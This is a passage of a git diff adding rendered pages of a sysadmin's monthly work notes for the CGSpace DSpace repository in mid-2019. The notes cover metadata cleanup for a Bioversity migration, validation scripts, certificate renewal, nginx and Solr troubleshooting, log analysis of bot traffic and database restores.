    • Fix a handful of incorrect CRPs that seem to have been split on comma “,”
    • +
    • Lots of strange values in cg.link.reference, and I normalized all DOIs to https://doi.org format +
        +
      • There are lots of invalid links here, like “36” and “recordlink:publications:2606” and “t3://record?identifier=publications&uid=2606”
      • +
      • Also there are hundreds of items that use the same value for cg.link.reference AND cg.link.dataurl
      • +
      +
    • +
    • Use https:// for all Bioversity links (reference, data url, permalink)
    • +
    +
  • +
  • +

    I might be able to use isbnlib to validate ISBNs in Python:

    +
  • +
+
if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
+    print("Yes")
+else:
+    print("No")
+
+
from stdnum import isbn
+from stdnum import issn
+
+isbn.validate('978-92-9043-389-7')
+issn.validate('1020-3362')
+

2019-07-26

+
    +
  • +

    Bioversity sent me an updated CSV file that fixes some of the issues I pointed out yesterday

    +
      +
    • There are still 1429 records
    • +
    • There is still one extra row and one extra column
    • +
    • There are still eight invalid ISBNs (according to my validate.py script)
    • +
    +
  • +
  • +

    I figured out a GREL to trim spaces in multi-value cells without splitting them:

    +
  • +
+
value.replace(/\s+\|\|/,"||").replace(/\|\|\s+/,"||")
+
    +
  • I whipped up a quick script using Python Pandas to do whitespace cleanup (a rough sketch follows below)
  • +
+
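
Roughly, the Pandas whitespace cleanup looks something like this (a simplified sketch, not the actual script; the file name is an assumption):

#!/usr/bin/env python3
# Hedged sketch of a Pandas-based whitespace cleanup (file name is an assumption)
import re
import pandas as pd

df = pd.read_csv("/tmp/bioversity.csv", dtype=str)

def clean_whitespace(value):
    if not isinstance(value, str):
        return value
    # strip leading/trailing whitespace and collapse internal runs to one space
    value = re.sub(r"\s+", " ", value).strip()
    # also remove whitespace around the "||" multi-value separator, like the GREL above
    return re.sub(r"\s*\|\|\s*", "||", value)

for column in df.columns:
    df[column] = df[column].apply(clean_whitespace)

df.to_csv("/tmp/bioversity-cleaned.csv", index=False)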

2019-07-29

+
    +
  • I turned the Pandas script into a proper Python package called csv-metadata-quality +
      +
    • It supports CSV and Excel files
    • +
    • It fixes whitespace errors and erroneous multi-value separators ("|") and validates ISSNs, ISBNs, and dates
    • +
    • Also I added a bunch of other checks/fixes for unnecessary and “suspicious” Unicode characters
    • +
    • I added fixes to drop duplicate metadata values
    • +
    • And lastly, I added validation of ISO 639-2 and ISO 639-3 languages
    • +
    • And lastly lastly, I added AGROVOC validation of subject terms
    • +
    +
  • +
  • Inform Bioversity that there is an error in their CSV, seemingly caused by quotes in the citation field
  • +
+

2019-07-30

+
    +
  • Add support for removing newlines (line feeds) to csv-metadata-quality
  • +
  • On the subject of validating some of our fields like countries and regions, Abenet pointed out that these should all be valid AGROVOC terms, so we can actually try to validate against that!
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2019-08/index.html b/docs/2019-08/index.html new file mode 100644 index 000000000..360a54bda --- /dev/null +++ b/docs/2019-08/index.html @@ -0,0 +1,627 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + August, 2019 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

August, 2019

+ +
+

2019-08-03

+
    +
  • Look at Bioversity’s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name… (a quick fix is sketched below)
  • +
+
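
A sketch of a quick fix for the padded column headers, assuming the CSV is read with Pandas (the file name is hypothetical):

#!/usr/bin/env python3
# Hedged sketch: strip stray whitespace from CSV column headers
import pandas as pd

df = pd.read_csv("/tmp/bioversity-migration.csv", dtype=str)
# for example "dc.title " -> "dc.title"
df = df.rename(columns=str.strip)
df.to_csv("/tmp/bioversity-migration-fixed.csv", index=False)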

2019-08-04

+
    +
  • Deploy ORCID identifier updates requested by Bioversity to CGSpace
  • +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • Before updating it I checked Solr and verified that all statistics cores were loaded properly…
    • +
    • After rebooting, all statistics cores were loaded… wow, that’s lucky.
    • +
    +
  • +
  • Run system updates on DSpace Test (linode19) and reboot it
  • +
+

2019-08-05

+ +
or(
+  isNotNull(value.match(/^.*’.*$/)),
+  isNotNull(value.match(/^.*é.*$/)),
+  isNotNull(value.match(/^.*á.*$/)),
+  isNotNull(value.match(/^.*è.*$/)),
+  isNotNull(value.match(/^.*í.*$/)),
+  isNotNull(value.match(/^.*ó.*$/)),
+  isNotNull(value.match(/^.*ú.*$/)),
+  isNotNull(value.match(/^.*à.*$/)),
+  isNotNull(value.match(/^.*û.*$/))
+).toString()
+
    +
  • I tried to extract the filenames and construct a URL to download the PDFs with my generate-thumbnails.py script, but there seem to be several paths for PDFs so I can’t guess it properly
  • +
  • I will have to wait for Francesco to respond about the PDFs, or perhaps proceed with a metadata-only upload so we can do other checks on DSpace Test
  • +
+

2019-08-06

+
    +
  • Francesca responded to address my feedback yesterday +
      +
    • I made some changes to the CSV based on her feedback (remove two duplicates, change one PDF file name, change two titles)
    • +
    • Then I found some items that have PDFs in multiple languages that only list one language in dc.language.iso so I changed them
    • +
    • Strangely, one item was referring to a 7zip file…
    • +
    • After removing the two duplicates there are now 1427 records
    • +
    • Fix one invalid ISSN: 1020-2002→1020-3362
    • +
    +
  • +
+

2019-08-07

+
    +
  • Daniel Haile-Michael asked about using a logical OR with the DSpace OpenSearch, but I looked in the DSpace manual and it does not seem to be possible
  • +
+

2019-08-08

+
    +
  • Moayad noticed that the HTTPS certificate expired on the AReS dev server (linode20) +
      +
    • The first problem was that there is a Docker container listening on port 80, so it conflicts with the ACME http-01 validation
    • +
    • The second problem was that we only allow access to port 80 from localhost
    • +
    • I adjusted the renew-letsencrypt systemd service so it stops/starts the Docker container and firewall:
    • +
    +
  • +
+
# /opt/certbot-auto renew --standalone --pre-hook "/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld" --post-hook "/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx"
+
    +
  • It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains
  • +
  • Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04’s OpenSSL 1.1.0g with nginx 1.16.0
  • +
  • Run all system updates on AReS dev server (linode20) and reboot it
  • +
  • Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:
  • +
+
$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
+$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload.csv
+$ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
+$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs2.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload2.csv
+$ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
+
    +
  • +

    (the weird sed regex removes color codes, because my generate-thumbnails script prints pretty colors)

    +
  • +
  • +

    Some PDFs are uploaded in different paths so I have to try a few times to get them all:

    +
      +
    • /fileadmin/_migrated/uploads/tx_news/
    • +
    • /fileadmin/user_upload/online_library/publications/pdfs/
    • +
    • /fileadmin/user_upload/
    • +
    +
  • +
  • +

    Even so, there are still 52 items with incorrect filenames, so I can’t derive their PDF URLs…

    + +
  • +
  • +

    I will proceed with a metadata-only upload first and then let them know about the missing PDFs

    +
  • +
  • +

    Troubleshoot an issue we had with proxying to the new development version of AReS from DSpace Test (linode19)

    +
      +
    • For some reason the host header in the proxy pass is not set so nginx on DSpace Test makes a request to the upstream nginx on an IP-based virtual host
    • +
    • The upstream nginx returns HTTP 444 because we configured it to not answer when a request does not send a valid hostname
    • +
    • The solution is to set the host header when proxy passing:
    • +
    +
  • +
+
proxy_set_header Host dev.ares.codeobia.com;
+
    +
  • Though I am really wondering why this happened now, because the configuration has been working for months…
  • +
  • Improve the output of the suspicious characters check in csv-metadata-quality script and tag version 0.2.0
  • +
+

2019-08-09

+
    +
  • Looking at the 128 IITA records (20195TH.xls) that Sisay uploaded to DSpace Test last month: IITA_July_29 +
      +
    • The records are pretty clean because Sisay ran them through the csv-metadata-quality tool
    • +
    • I fixed one incorrect country (MELBOURNE)
    • +
    • I normalized all DOIs to the https://doi.org format (see the sketch after this list)
    • +
    • This item is using the wrong Google Books link: https://dspacetest.cgiar.org/handle/10568/102593
    • +
    • The French abstract here has copy/paste errors: https://dspacetest.cgiar.org/handle/10568/102491
    • +
    • Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine: +
        +
      • $ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id
      • +
      • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
      • +
      +
    • +
    • I asked Bosede to check about twenty-five invalid AGROVOC subjects identified by csv-metadata-quality script
    • +
    • I still need to check the sponsors and then check for duplicates
    • +
    +
  • +
+
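
For reference, a minimal sketch of the kind of DOI normalization described above (only illustrative; not necessarily how I actually did it):

#!/usr/bin/env python3
# Hedged sketch: normalize DOI variants to the https://doi.org/ form
import re

def normalize_doi(value):
    # pull out the "10.xxxx/..." part regardless of the prefix style
    match = re.search(r"(10\.\d{4,9}/\S+)", value)
    return "https://doi.org/" + match.group(1) if match else value

print(normalize_doi("http://dx.doi.org/10.1016/j.agwat.2018.06.018"))
print(normalize_doi("DOI: 10.1016/j.agwat.2018.06.018"))
# both print: https://doi.org/10.1016/j.agwat.2018.06.018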

2019-08-10

+
    +
  • Add checks for uncommon filename extensions and replacements for unnecessary Unicode to the csv-metadata-quality script
  • +
+

2019-08-12

+ +

2019-08-13

+
    +
  • Create a test user on DSpace Test for Mohammad Salem to attempt depositing:
  • +
+
$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
+
    +
  • Create and merge a pull request (#429) to add eleven new CCAFS Phase II Project Tags to CGSpace
  • +
  • Atmire responded to the Solr cores issue last week, but they could not reproduce the issue +
      +
    • I told them not to continue, and that we would keep an eye on it and keep troubleshooting it (if necessary) in the public eye on dspace-tech and Solr mailing lists
    • +
    +
  • +
  • Testing an import of 1,429 Bioversity items (metadata only) on my local development machine and got an error with Java memory after about 1,000 items:
  • +
+
$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
+...
+java.lang.OutOfMemoryError: GC overhead limit exceeded
+
    +
  • I increased the heap size to 1536m and tried again:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1536m"
+$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
+
    +
  • This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM
  • +
  • (oops, I realize that actually I forgot to delete items I had flagged as duplicates, so the total should be 1,427 items)
  • +
+

2019-08-14

+
    +
  • I imported the 1,427 Bioversity records into DSpace Test +
      +
    • To make sure we didn’t have memory issues I reduced Tomcat’s JVM heap by 512m, increased the import process’s heap to 512m, and split the input file into two parts with about 700 records each (see the sketch below)
    • +
    • Then I had to create a few new temporary collections on DSpace Test that had been created on CGSpace after our last sync
    • +
    • After that the import succeeded:
    • +
    +
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
+$ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
+$ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
+
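
For reference, one way to split the CSV into two halves (a sketch; I’m not claiming this is how the split was actually done, though the output file names match the import commands above):

#!/usr/bin/env python3
# Hedged sketch: split a metadata CSV into two roughly equal halves
import pandas as pd

df = pd.read_csv("/tmp/bioversity.csv", dtype=str)
half = len(df) // 2

df.iloc[:half].to_csv("/tmp/bioversity1.csv", index=False)
df.iloc[half:].to_csv("/tmp/bioversity2.csv", index=False)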
    +
  • The next step is to check these items for duplicates
  • +
+

2019-08-16

+
    +
  • Email Bioversity to let them know that the 1,427 records are on DSpace Test and that Abenet should look over them
  • +
+

2019-08-18

+
    +
  • Deploy latest 5_x-prod branch on CGSpace (linode18), including the new CCAFS project tags
  • +
  • Deploy Tomcat 7.0.96 and PostgreSQL JDBC 42.2.6 driver on CGSpace (linode18)
  • +
  • After restarting Tomcat one of the Solr statistics cores failed to start up:
  • +
+
statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
+
    +
  • I decided to run all system updates on the server and reboot it
  • +
  • After reboot the statistics-2018 core failed to load so I restarted tomcat7 again
  • +
  • After this last restart all Solr cores seem to be up and running
  • +
+

2019-08-20

+
    +
  • Francesco sent me a new CSV with the raw filenames and paths for the Bioversity migration +
      +
    • All file paths are relative to the Typo3 upload path of /fileadmin on the Bioversity website
    • +
    • I create a new column with the derived URL that I can use to download the PDFs with my generate-thumbnails.py script
    • +
    • Unfortunately now the filename column has paths too, so I have to use a simple Python/Jython script in OpenRefine to get the basename of the files in the filename column:
    • +
    +
  • +
+
import os
+
+return os.path.basename(value)
+
    +
  • Then I can try to download all the files again with the script
  • +
  • I also asked Francesco about the strange filenames (.LCK, .zip, and .7z)
  • +
+

2019-08-21

+
    +
  • Upload csv-metadata-quality repository to ILRI’s GitHub organization
  • +
  • Fix a few invalid countries in IITA’s July 29 records (aka “20195TH.xls”) +
      +
    • These were not caught by my csv-metadata-quality check script because of a logic error
    • +
    • Remove dc.identifier.uri fields from the test data, set id values to “-1”, add collection mappings according to dc.type, and upload 126 IITA records to CGSpace
    • +
    +
  • +
+

2019-08-22

+ +

2019-08-23

+
    +
  • Run system updates on AReS / OpenRXV dev server (linode20) and reboot it
  • +
  • Fix AReS exports on DSpace Test by adding a new nginx proxy pass
  • +
+

2019-08-26

+
    +
  • Peter sent 2,943 corrections to the author dump I had originally sent him on 2019-05-27 +
      +
    • I noticed that one correction had a missing space after the comma, ie “Adamou,A.” so I corrected it
    • +
    • Also, I should add that as a check to the csv-metadata-quality pipeline
    • +
    • Apply the corrections on my local dev machine in preparation for applying them on CGSpace:
    • +
    +
  • +
+
$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
+
    +
  • Apply the corrections on CGSpace and DSpace Test +
      +
    • After that I started a full Discovery re-indexing on both servers:
    • +
    +
  • +
+
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    81m47.057s 
+user    8m5.265s 
+sys     2m24.715s
+
    +
  • +

    Peter asked me to add related citation aka cg.link.citation to the item view

    +
      +
    • I created a pull request with a draft implementation and asked for Peter’s feedback
    • +
    +
  • +
  • +

    Add the ability to skip certain fields from the csv-metadata-quality script using --exclude-fields

    +
      +
    • For example, when I’m working on the author corrections I want to do the basic checks on the corrected fields, but not on the original fields, so I would use --exclude-fields dc.contributor.author for example
    • +
    +
  • +
+

2019-08-27

+
    +
  • File an issue on OpenRXV for the bug when selecting communities
  • +
  • Peter approved the related citation changes so I merged the pull request on GitHub and will deploy it to CGSpace this weekend
  • +
  • Add a safety feature to fix-metadata-values.py that skips correction values that contain the ‘|’ character (see the sketch after this list)
  • +
  • Help Francesco from Bioversity with the REST and OAI APIs on CGSpace +
      +
    • He is contracted by Bioversity to work on the migration from Typo3
    • +
    • I told him that the OAI interface only exposes Dublin Core fields in its default configuration and that he might want to use OAI to get the latest-changed items, then use REST API to get their metadata
    • +
    +
  • +
  • Add a fix for missing space after commas to my csv-metadata-quality script and tag version 0.2.2
  • +
+
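
A rough sketch of the two small fixes mentioned in this list, i.e. skipping correction values that contain “|” and adding a missing space after commas (the real fix-metadata-values.py and csv-metadata-quality implementations may differ, and the function names here are only illustrative):

#!/usr/bin/env python3
# Hedged sketch of the two checks described above; the actual scripts may differ
import re

def is_safe_correction(value):
    # skip corrections that contain the multi-value separator character "|",
    # since applying them blindly could corrupt multi-value fields
    return "|" not in value

def fix_comma_space(value):
    # insert a space after a comma that is immediately followed by a letter,
    # e.g. "Adamou,A." -> "Adamou, A."
    return re.sub(r",([A-Za-z])", r", \1", value)

print(is_safe_correction("Some Author||Another Author"))  # False -> skip this correction
print(fix_comma_space("Adamou,A."))                       # Adamou, A.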

2019-08-28

+
    +
  • Skype with Jane about AReS Phase III priorities
  • +
  • I did a test to automatically fix some authors in the database using my csv-metadata-quality script +
      +
    • First I dumped a list of all unique authors:
    • +
    +
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
+COPY 65597
+
    +
  • Then I created a new CSV with two author columns (edit title of second column after):
  • +
+
$ csvcut -c dc.contributor.author,dc.contributor.author /tmp/2019-08-28-all-authors.csv > /tmp/all-authors.csv
+
    +
  • Then I ran my script on the new CSV, skipping one of the author columns:
  • +
+
$ csv-metadata-quality -u -i /tmp/all-authors.csv -o /tmp/authors.csv -x dc.contributor.author
+
    +
  • This fixed a bunch of issues with spaces, commas, unnecessary Unicode characters, etc
  • +
  • Then I ran the corrections on my test server and there were 185 of them!
  • +
+
$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
+
    +
  • I very well might run these on CGSpace soon…
  • +
+

2019-08-29

+
    +
  • Resume working on the CG Core v2 changes in the 5_x-cgcorev2 branch again +
      +
    • I notice that CG Core doesn’t currently have a field for CGSpace’s “alternative title” (dc.title.alternative), but DCTERMS has dcterms.alternative so I raised an issue about adding it
    • +
    • Marie responded and said she would add dcterms.alternative
    • +
    • I created a sed script file to perform some replacements of metadata on the XMLUI XSL files:
    • +
    +
  • +
+
$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec ./cgcore-xsl-replacements.sed {} \;
+
    +
  • I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running: +
      +
    • Need to assess the XSL changes to see if things like not(@qualifier)] still make sense after we move fields from DC to DCTERMS, as some fields will no longer have qualifiers
    • +
    • Do I need to edit the author links to remove dc.contributor.author in 0_CGIAR/xsl/aspect/artifactbrowser/item-list-alterations.xsl?
    • +
    • Do I need to edit the author links to remove dc.contributor.author in 0_CGIAR/xsl/aspect/discovery/discovery-item-list-alterations.xsl?
    • +
    +
  • +
  • Thierry Lewadle asked why some PDFs on CGSpace open in the browser and some download +
      +
    • I told him it is because of the “content disposition” that causes DSpace to tell the browser to open or download the file based on its file size (currently around 8 megabytes)
    • +
    +
  • +
  • Peter asked why an item on CGSpace has no Altmetric donut on the item view, but has one in our explorer +
      +
    • I looked in the network requests when loading the CGSpace item view and I see the following response to the Altmetric API call:
    • +
    +
  • +
+
"handles":["10986/30568","10568/97825"],"handle":"10986/30568"
+
    +
  • So this is the same issue we had before, where Altmetric knows this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn’t show it because it seems to be a secondary handle or something
  • +
+

2019-08-31

+
    +
  • Run system updates on DSpace Test (linode19) and reboot the server
  • +
  • Run the author fixes on DSpace Test and CGSpace and start a full Discovery re-index:
  • +
+
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+ 
+real    90m47.967s
+user    8m12.826s
+sys     2m27.496s
+
    +
  • I set up a test environment for CG Core v2 on my local environment and ran all the field migrations +
      +
    • DSpace comes up and runs, but there are some graphical issues, like missing community names
    • +
    • It turns out that my sed script was replacing some XSL code that was responsible for printing community names
    • +
    • See: dspace/modules/xmlui-mirage2/src/main/webapp/themes/0_CGIAR/xsl/preprocess/custom/communitylist.xsl
    • +
    • After reading the code I see that XSLT is reading the community titles from the DIM representation (stored in the $dim variable) created from METS
    • +
    • I modified the patterns in my sed script so that those lines are not replaced and then the community list works again
    • +
    • This is actually not a problem at all because this metadata is only used in the HTML meta tags in XMLUI community lists and has nothing to do with item metadata
    • +
    +
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2019-09/index.html b/docs/2019-09/index.html new file mode 100644 index 000000000..499e4bed3 --- /dev/null +++ b/docs/2019-09/index.html @@ -0,0 +1,635 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + September, 2019 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

September, 2019

+ +
+

2019-09-01

+
    +
  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
  • +
  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+
    +
  • 3.94.211.189 is MauiBot, and most of its requests are to Discovery and get rate limited with HTTP 503
  • +
  • 163.172.71.23 is some IP on Online SAS in France and its user agent is:
  • +
+
Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+
    +
  • It actually got mostly HTTP 200 responses:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
+   1775 200
+    703 499
+     72 503
+
    +
  • And it was mostly requesting Discover pages:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c 
+   2350 discover
+     71 handle
+
    +
  • I’m not sure why the outbound traffic rate was so high…
  • +
+

2019-09-02

+
    +
  • Follow up with Carol and Francesca from Bioversity as they were on holiday during mid-to-late August +
      +
    • I told them to check the temporary collection on DSpace Test where I uploaded the 1,427 items so they can see how it will look
    • +
    • Also, I told them to advise me about the strange file extensions (.7z, .zip, .lck)
    • +
    • Also, I reminded Abenet to check the metadata, as the institutional authors at least will need some modification
    • +
    +
  • +
+

2019-09-10

+
    +
  • Altmetric responded to say that they have fixed an issue with their badge code so now research outputs with multiple handles are showing badges! + +
  • +
  • Follow up with Bosede about the mixup with PDFs in the items uploaded in 2018-12 (aka Daniel1807.xsl) +
      +
    • These are the same ones that Peter noticed last week, that Bosede and I had been discussing earlier this year that we never sorted out
    • +
    • It looks like these items were uploaded by Sisay on 2018-12-19 so we can use the accession date as a filter to narrow it down to 230 items (of which only 104 have PDFs, according to the Daniel1807.xls input file)
    • +
    • Now I just checked a few manually and they are correct in the original input file, so something must have happened when Sisay was processing them for upload
    • +
    • I have asked Sisay to fix them…
    • +
    +
  • +
  • Continue working on CG Core v2 migration, focusing on the crosswalk mappings +
      +
    • I think we can skip the MODS crosswalk for now because it is only used in AIP exports that are meant for non-DSpace systems
    • +
    • We should probably do the QDC crosswalk as well as those in xhtml-head-item.properties
    • +
    • Ouch, there is potentially a lot of work in the OAI metadata formats like DIM, METS, and QDC (see dspace/config/crosswalks/oai/*.xsl)
    • +
    • In general I think I should only modify the left side of the crosswalk mappings (ie, where metadata is coming from) so we maintain the same exact output for search engines, etc
    • +
    +
  • +
+

2019-09-11

+
    +
  • Maria Garruccio asked me to add two new Bioversity ORCID identifiers to CGSpace so I created a pull request
  • +
  • Marissa Van Epp asked me to add new CCAFS Phase II project tags to CGSpace so I created a pull request +
      +
    • I will wait until I hear from her to merge it because there is one tag that seems to be a duplicate because its name (PII-WA_agrosylvopast) is similar to one that already exists (PII-WA_AgroSylvopastoralSystems)
    • +
    +
  • +
  • More work on the CG Core v2 migrations + +
  • +
+

2019-09-12

+ +

2019-09-15

+
    +
  • Deploy Bioversity ORCID identifier updates to CGSpace
  • +
  • Deploy PostgreSQL JDBC driver 42.2.7 on CGSpace
  • +
  • Run system updates on CGSpace (linode18) and restart the server +
      +
    • After restarting the system Tomcat came back up, but not all Solr statistics cores were loaded
    • +
    • I had to restart Tomcat one more time until the cores were loaded (verified in the Solr admin)
    • +
    +
  • +
  • Update nginx TLS cipher suite to the latest Mozilla intermediate recommendations for nginx 1.16.0 and openssl 1.0.2 +
      +
    • DSpace Test (linode19) is running Ubuntu 18.04 with nginx 1.17.x and openssl 1.1.1 so it can even use TLS v1.3 if we override the nginx ssl protocol in its host vars
    • +
    +
  • +
  • XMLUI item view pages are blank on CGSpace right now +
      +
    • Like earlier this year, I see the following error in the Cocoon log while browsing:
    • +
    +
  • +
+
2019-09-15 15:32:18,137 WARN  org.apache.cocoon.components.xslt.TraxErrorListener  - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
+
    +
  • Around the same time I see the following in the DSpace log:
  • +
+
2019-09-15 15:32:18,079 INFO  org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644 
+2019-09-15 15:32:18,135 WARN  org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name="METSRIGHTS"
+
    +
  • I see a lot of these errors today, but not earlier this month:
  • +
+
# grep -c 'Cannot find named plugin' dspace.log.2019-09-*
+dspace.log.2019-09-01:0
+dspace.log.2019-09-02:0
+dspace.log.2019-09-03:0
+dspace.log.2019-09-04:0
+dspace.log.2019-09-05:0
+dspace.log.2019-09-06:0
+dspace.log.2019-09-07:0
+dspace.log.2019-09-08:0
+dspace.log.2019-09-09:0
+dspace.log.2019-09-10:0
+dspace.log.2019-09-11:0
+dspace.log.2019-09-12:0
+dspace.log.2019-09-13:0
+dspace.log.2019-09-14:0
+dspace.log.2019-09-15:808
+
    +
  • Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:
  • +
+
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.METSRightsCrosswalk", name="METSRIGHTS"
+2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.OREDisseminationCrosswalk", name="ore"
+2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.DIMDisseminationCrosswalk", name="dim"
+
    +
  • I restarted Tomcat and the item views came back, but then the Solr statistics cores didn’t all load properly +
      +
    • After restarting Tomcat once again, both the item views and the Solr statistics cores all came back OK
    • +
    +
  • +
+

2019-09-19

+
    +
  • For some reason my podman PostgreSQL container isn’t working so I had to use Docker to re-create it for my testing work today:
  • +
+
# docker pull docker.io/library/postgres:9.6-alpine
+# docker volume create dspacedb_data
+# docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+
    +
  • Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications +
      +
    • I manually checked the ORCID profile links to make sure they matched the names
    • +
    • Then I created an input file to use with my add-orcid-identifiers-csv.py script:
    • +
    +
  • +
+
dc.contributor.author,cg.creator.id
+"Kihara, Job","Job Kihara: 0000-0002-4394-9553"
+"Twyman, Jennifer","Jennifer Twyman: 0000-0002-8581-5668"
+"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
+"Arango, Jacobo","Jacobo Arango: 0000-0002-4828-9398"
+"Chavarriaga Aguirre, Paul","Paul Chavarriaga-Aguirre: 0000-0001-7579-3250"
+"Paul, Birthe","Birthe Paul: 0000-0002-5994-5354"
+"Eitzinger, Anton","Anton Eitzinger: 0000-0001-7317-3381"
+"Hoek, Rein van der","Rein van der Hoek: 0000-0003-4528-7669"
